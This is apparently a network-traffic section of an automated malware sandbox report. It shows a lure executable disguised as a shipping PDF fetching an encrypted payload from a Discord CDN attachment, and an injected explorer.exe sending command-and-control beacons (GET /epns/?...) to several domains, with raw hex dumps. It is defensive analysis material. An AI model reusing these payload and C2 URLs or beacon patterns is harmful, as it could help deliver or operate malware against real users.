                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.549800213.186.33.580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:13.893824100 CEST7551OUTGET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1
                                                Host: www.jkformationfrance.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:13.918915987 CEST7551INHTTP/1.1 302 Moved Temporarily
                                                server: nginx
                                                date: Wed, 13 Oct 2021 18:37:13 GMT
                                                content-type: text/html
                                                content-length: 138
                                                location: http://www.jkformationfrance.com
                                                x-iplb-request-id: 66818F21:C288_D5BA2105:0050_61672759_30A6E198:CEDD
                                                x-iplb-instance: 16976
                                                set-cookie: SERVERID77446=200174|YWcnX|YWcnX; path=/; HttpOnly
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.5498013.64.163.5080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:19.019618034 CEST7552OUTGET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1
                                                Host: www.bombers.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:19.037596941 CEST7553INHTTP/1.1 410 Gone
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 18:37:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6d 62 65 72 73 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 37 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6d 62 65 72 73 2e 78 79 7a 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='5; url=http://www.bombers.xyz/' />a </head>9 <body>37 You are being redirected to http://www.bombers.xyza </body>8</html>0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.5498023.223.115.18580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:36.226020098 CEST7554OUTGET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1
                                                Host: www.goodtasteonline.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:36.363409042 CEST7555INHTTP/1.1 302 Found
                                                Cache-Control: private
                                                Content-Type: text/html; charset=utf-8
                                                Location: https://www.hugedomains.com/domain_profile.cfm?d=goodtasteonline&e=com
                                                Server: Microsoft-IIS/8.5
                                                X-Powered-By: ASP.NET
                                                Date: Wed, 13 Oct 2021 18:36:38 GMT
                                                Connection: close
                                                Content-Length: 191
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 67 6f 6f 64 74 61 73 74 65 6f 6e 6c 69 6e 65 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=goodtasteonline&amp;e=com">here</a>.</h2></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.54980734.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:41.428119898 CEST7576OUTGET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1
                                                Host: www.alltart.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:41.542718887 CEST7577INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 18:37:41 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.54980835.209.104.9080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 20:37:46.748889923 CEST7578OUTGET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1
                                                Host: www.thesidehustler.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 20:37:46.926012039 CEST7578INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 13 Oct 2021 18:37:46 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 334
                                                Connection: close
                                                X-Content-Type-Options: nosniff
                                                Location: https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk
                                                Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                X-Proxy-Cache: MISS
                                                X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 73 69 64 65 68 75 73 74 6c 65 72 2e 6e 65 74 2f 65 70 6e 73 2f 3f 77 56 7a 48 4a 3d 42 52 57 64 51 36 26 61 6d 70 3b 35 6a 7a 3d 53 75 33 63 6c 46 32 4a 57 76 4c 46 47 62 55 6f 33 36 43 4f 4b 72 6c 66 52 32 63 54 6a 57 64 4b 71 67 4e 4d 74 32 55 50 2f 6c 6d 31 57 63 75 57 39 69 56 46 58 46 39 57 44 32 52 58 76 61 51 71 75 71 55 6b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&amp;5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk">here</a>.</p></body></html>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549731162.159.129.233443C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-10-13 18:35:47 UTC0OUTGET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1
                                                User-Agent: lVali
                                                Host: cdn.discordapp.com
                                                2021-10-13 18:35:47 UTC0INHTTP/1.1 200 OK
                                                Date: Wed, 13 Oct 2021 18:35:47 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 283648
                                                Connection: close
                                                CF-Ray: 69daab76efc85c38-FRA
                                                Accept-Ranges: bytes
                                                Age: 11417
                                                Cache-Control: public, max-age=31536000
                                                Content-Disposition: attachment;%20filename=Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq
                                                ETag: "0584cd5c8571b60faaa2811123ac81ce"
                                                Expires: Thu, 13 Oct 2022 18:35:47 GMT
                                                Last-Modified: Wed, 13 Oct 2021 15:07:57 GMT
                                                Vary: Accept-Encoding
                                                CF-Cache-Status: HIT
                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                x-goog-generation: 1634137677483270
                                                x-goog-hash: crc32c=+JhllA==
                                                x-goog-hash: md5=BYTNXIVxtg+qooERI6yBzg==
                                                x-goog-metageneration: 1
                                                x-goog-storage-class: STANDARD
                                                x-goog-stored-content-encoding: identity
                                                x-goog-stored-content-length: 283648
                                                X-GUploader-UploadID: ADPycduGriJbFyWO3Ajj_7J6Zp42-vZFeJqDaEKSLbDXSCG_QR3-28T4UU8losd0PhRIFGKcDfjlfEiv-ZVdDLP8AEI
                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                2021-10-13 18:35:47 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 55 44 42 70 62 78 4c 51 31 42 62 53 49 4b 34 6a 25 32 42 54 45 4d 45 78 58 45 66 76 67 62 67 37 74 7a 4d 25 32 46 25 32 46 55 46 54 4c 7a 32 30 35 4c 7a 61 25 32 42 59 6e 32 42 33 4a 38 48 77 79 78 46 6c 53 48 38 74 33 6d 38 7a 45 49 76 6e 37 33 64 42 45 57 64 44 45 4c 4b 73 33 5a 48 52 37 78 6d 33 76 78 75 48 4e 6c 36 59 6f 77 30 54 75 58 7a 4f 48 4e 39 74 52 47 69 25 32 46 67 4a 48 33 64 62 75 63 53 56 4b 35 68 59 66 4b 45 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UDBpbxLQ1BbSIK4j%2BTEMExXEfvgbg7tzM%2F%2FUFTLz205Lza%2BYn2B3J8HwyxFlSH8t3m8zEIvn73dBEWdDELKs3ZHR7xm3vxuHNl6Yow0TuXzOHN9tRGi%2FgJH3dbucSVK5hYfKEA%3D%3D"}],"group":"cf-nel","max_a
                                                2021-10-13 18:35:47 UTC1INData Raw: 19 c6 ec b4 32 7a aa 0e a0 08 90 64 f2 4d af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af b2 2a 6d 02 83 c4 d9 0e b7 b9 4c 35 81 38 0d 35 9d e7 36 09 12 b5 bd 4d af ad a8 13 37 8e 5a ce ed d8 8a 5f 63 77 20 53 5d 62 ff e2 a1 8d d8 9d e7 29 ef ca e2 a1 8d d8 9d f8 54 c6 e6 ab a0 16 a2 13 34 0c ab a5 96 6f 00 82 b0 24 58 dd 18 af
                                                Data Ascii: 2zdM*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X*mL5856M7Z_cw S]b)T4o$X
                                                2021-10-13 18:35:47 UTC2INData Raw: 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1
                                                Data Ascii: [9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL
                                                2021-10-13 18:35:47 UTC4INData Raw: 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab
                                                Data Ascii: 'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH
                                                2021-10-13 18:35:47 UTC4INData Raw: 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef
                                                Data Ascii: "pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqc
                                                2021-10-13 18:35:47 UTC5INData Raw: 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50 5d ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a 48 ab 22 dc 1e cc 70 0b be 4c b1 39 14 21 5b f6 dc 16 39 09 81 a8 9d 7f b5 21 5d f0 de 00 1a c2 40 9e 94 f2 c7 ea 32 fa de 07 88 db 8c d5 8d 50 47 30 e1 bd ce 78 30 e3 b3 3a 87 43 27 60 6b 9d 6b 80 39 0c 3a 99 60 75 84 dc 11 b6 ba 50
                                                Data Ascii: z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP]z/w^qZUl'uQt;5H)fqcZH"pL9![9!]@2PG0x0:C'`kk9:`uP
                                                2021-10-13 18:35:47 UTC6INData Raw: dc ab 5c f3 f3 f0 6a ea 25 bb f1 d8 bd ae a7 fa 65 f1 f5 87 58 bf f4 d2 54 6f 7c 9c c6 ae bb ff 9a fd 26 cb 06 8f b3 5d e0 9d 93 71 73 3e d2 48 5c 5f f8 f6 30 e2 c3 0c 2b d3 10 25 5f ea 09 21 38 67 a1 94 59 98 e9 59 90 42 47 67 e1 40 b2 a4 47 d0 63 4e 10 be ac 91 ca 84 18 25 ef b4 b2 b3 28 5c a8 e4 ff 82 7a 3e 72 f5 49 d3 f0 c9 77 bd 22 b9 cb 0b 16 29 d6 36 88 e1 41 46 05 ab 16 0c 84 46 e9 b7 2b d0 78 48 b4 54 fd 76 5f 0c c2 bf f2 cd 92 cc 6c b3 4a be fc ea 4d 51 cc 68 8c a9 b2 b9 3d 35 02 19 b2 09 88 1b ec 2a f9 8a c1 56 65 f6 14 ac af 3e 49 e4 8f 4d 29 ad 5e 82 f6 02 92 ff df 7d 23 e9 68 b2 73 54 eb ac 76 b3 3b af e4 22 63 2f 7f 50 94 ff 8d 92 e0 3a 2f 60 dd b7 38 69 69 92 04 70 1d 08 f1 af c7 ea 5c bf ca 84 cb 02 92 a7 74 fb d3 8f eb 96 7d 9d c3 f8 c7
                                                Data Ascii: \j%eXTo|&]qs>H\_0+%_!8gYYBGg@GcN%(\z>rIw")6AFF+xHTv_lJMQh=5*Ve>IM)^}#hsTv;"c/P:/`8iip\t}
                                                2021-10-13 18:35:47 UTC8INData Raw: 73 71 49 f4 35 d7 6e e9 ab 21 41 0a 7b ce 38 41 9b d5 9d 68 19 ef b5 ca 44 60 88 78 21 59 cc 07 38 18 f6 15 01 70 11 b5 2c e0 8e 77 bb 06 fb eb a5 0c 25 ea 77 ff cf 35 b1 d8 0c 22 ca 39 c0 93 e0 e2 94 13 b6 a2 94 c7 89 39 29 b5 8d aa 92 e5 ae dd 98 fc 84 0a a5 eb b6 af 32 f1 5a 54 5f 22 38 74 12 3e 91 4b f2 19 f5 8c 32 72 16 32 fe d2 39 4e 38 48 5d 3b 02 05 86 f0 0b 6e fb b2 42 63 f6 d6 11 ff 66 7a 51 1e 71 41 26 f5 49 c0 b6 5a 30 31 93 b1 3c 8f 5f f0 c5 d5 90 31 9d a9 14 22 cc f0 3e 1b 2d ba f2 1b 59 ce 73 8d 52 5a 44 75 7c f7 42 a3 14 5f e1 a6 c3 1d fb bd c8 7a 34 06 fd d4 2d b2 0b 33 1d 54 4c c5 78 85 e1 64 98 6b 83 42 a2 ca fb c0 80 f2 28 75 8f 45 31 22 8b 16 8b 88 2c 7d b9 c9 ec ef b7 cf 1f 81 0b 0e 2b 6d 8d d3 d5 ce df 41 c0 c0 58 4e 49 11 ba 55 d6
                                                Data Ascii: sqI5n!A{8AhD`x!Y8p,w%w5"99)2ZT_"8t>K2r29N8H];nBcfzQqA&IZ01<_1">-YsRZDu|B_z4-3TLxdkB(uE1",}+mAXNIU
                                                2021-10-13 18:35:47 UTC9INData Raw: 67 ff 03 2e 58 85 8c 6e fb 6a 10 34 e7 66 b5 85 8d b6 4f cb e1 a8 a8 f1 3f 42 7b 49 f2 c4 55 d2 f5 09 c7 77 60 82 e4 3d 17 aa 70 f0 26 e9 65 08 d2 7c 33 19 72 d6 ca 9e 57 6b 57 d5 92 ff be f2 74 ed 88 25 94 fc fd 64 ec b2 35 7d 63 15 6a 0a 0a 06 ed 0d f0 16 f2 7b 76 38 99 73 9c d6 39 83 9c 1e 0e 3b 14 2c e7 29 fe 4d f8 6a e4 28 fb 7e 7e a9 b8 9a 38 35 e5 b7 21 56 d9 a3 2d b0 6a ea ac a1 0b a6 22 96 bc e1 68 e4 ca 7d aa 84 54 ca 90 9b a6 74 b2 bf da 17 a4 84 d5 80 e8 83 ea 32 fe e9 75 47 f4 9d a0 64 e1 ae bf d9 37 5e 37 93 ba fe 4f c2 41 2b 38 c9 ae 41 ed a4 95 7a 31 71 d6 61 88 ff be a8 8c cc 72 12 65 dd bd bd 1b fe e9 a2 90 f5 f3 c3 2e dd 53 76 33 16 3c 97 ba b0 28 bf 01 69 89 4b 23 59 e0 f1 88 25 9d c1 c7 fa c0 44 ef de 89 93 af 90 e4 36 84 cf b2 1a 62
                                                Data Ascii: g.Xnj4fO?B{IUw`=p&e|3rWkWt%d5}cj{v8s9;,)Mj(~~85!V-j"h}Tt2uGd7^7OA+8Az1qare.Sv3<(iK#Y%D6b
                                                2021-10-13 18:35:47 UTC10INData Raw: 0a 0a 06 0d 65 06 7f 7f 00 da 80 2c e9 41 74 cf 46 72 fb cf 62 76 38 77 b9 b3 e2 e2 95 ff cc 6d 93 f0 25 04 65 38 35 9e 11 b1 2c 6b 09 40 d5 41 cc e0 87 48 b5 e5 fd 6c 07 5d 01 23 c2 40 85 69 35 07 37 d6 e9 1c 6f 9b 7f d0 42 6b 28 37 bd 6a 9b 7a 2a 5f 19 15 4d e0 c2 c3 7c 27 6b 27 cf f9 ca b6 00 01 22 ce 7c bb 61 b2 5f 25 ba 44 35 1f 5a 83 e5 3d 23 8c 30 e3 47 32 f4 02 c9 e2 37 dd 21 50 db 8f 48 9c d6 6c d7 41 99 7b 36 81 bd 29 72 eb 62 a1 e8 3b be 57 d7 0c 15 d0 19 82 80 24 4f dc 00 8c ff ce 8d 91 d8 0d 30 fa d3 f8 7e 85 40 40 2e d1 56 52 50 18 9e 28 19 90 52 7e a4 8a cf 99 ee 79 a8 48 1c 9a 59 de 1b bd 52 62 18 f5 fc b4 1e cc 69 96 1a 87 6d 5f 1a af b7 36 87 67 ea 63 24 12 8b 37 ea 31 6f 8e 67 b2 c7 35 bc 32 6c 03 83 3e 94 78 93 b0 43 57 7d b8 48 37 01
                                                Data Ascii: e,AtFrbv8wm%e85,k@AHl]#@i57oBk(7jz*_M|'k'"|a_%D5Z=#0G27!PHlA{6)rb;W$O0~@@.VRP(R~yHYRbim_6gc$71og52l>xCW}H7
                                                2021-10-13 18:35:47 UTC12INData Raw: 80 37 0a 1c 0d ac 57 7d 6d 6e 1e c4 4a bf 0a 4d b7 7c ed fb 61 eb a2 82 cb 16 b2 cd 3c 72 15 ab 3b 19 2f 22 a1 6f 45 cd ed 5e 65 f2 a4 7e c8 b5 ee 7a 32 ee d9 9a 36 a8 62 1c 03 37 00 17 bb c6 0a c1 6c 57 07 77 a7 17 a4 90 5f 27 d7 81 7f 09 82 24 c3 cd 0a ce 99 ed 88 77 98 eb b8 4c b1 ed ce 15 67 4c 9d 7a 2d 69 66 8b 58 f5 82 8c 9e 9e 9b 64 d8 a0 22 b2 60 c3 8d 55 d7 8b 5a 6f 55 38 46 01 e4 2d 73 83 3c 31 98 fc 37 fa b0 bd c4 5d 04 d2 90 bd 02 b0 c2 46 a7 03 62 8d c4 25 8f e4 56 49 3f 12 10 83 c8 af fd 88 a0 83 4a bf 31 77 15 19 8a 64 11 b2 a7 18 95 ef 9a 0a d3 63 9a f9 5d e6 12 9e d1 11 7c d5 f9 42 a4 84 37 20 b9 07 5b 59 31 63 e4 33 b1 0a 2e 8e 12 d5 b7 3a 9d 68 16 ab 1e 4b fa 66 53 cc 6b 92 d0 16 dd 8e 1a 2b 43 3b 0d a2 df d4 ee df 5c d7 b2 b0 ad 3b 6e
                                                Data Ascii: 7W}mnJM|a<r;/"oE^e~z26b7lWw_'$wLgLz-ifXd"`UZoU8F-s<17]Fb%VI?J1wdc]|B7 [Y1c3.:hKfSk+C;\;n
